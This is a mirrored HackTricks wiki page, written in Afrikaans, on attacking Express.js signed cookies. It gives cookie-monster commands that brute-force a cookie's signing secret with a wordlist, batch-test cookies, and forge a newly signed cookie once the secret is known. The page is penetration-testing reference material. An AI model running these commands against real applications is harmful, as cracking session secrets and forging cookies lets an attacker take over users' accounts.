mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
30 lines
889 B
Markdown
30 lines
889 B
Markdown
# NodeJS Express
|
|
|
|
## Koekie Handtekening
|
|
|
|
Die hulpmiddel [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) is 'n nut vir die outomatisering van die toetsing en herhandtekening van Express.js koekie geheime.
|
|
|
|
### Enkel koekie met 'n spesifieke naam
|
|
```bash
|
|
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
|
|
```
|
|
### Pasgemaakte woordlys
|
|
```bash
|
|
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst
|
|
```
|
|
### Toets verskeie koekies met batch-modus
|
|
```bash
|
|
cookie-monster -b -f cookies.json
|
|
```
|
|
### Toets verskeie koekies met batchmodus met 'n pasgemaakte woordlys
|
|
```bash
|
|
cookie-monster -b -f cookies.json -w custom.lst
|
|
```
|
|
### Kodifiseer en teken 'n nuwe koekie
|
|
|
|
As jy die geheim ken, kan jy die koekie teken.
|
|
```bash
|
|
cookie-monster -e -f new_cookie.json -k secret
|
|
```
|
|
|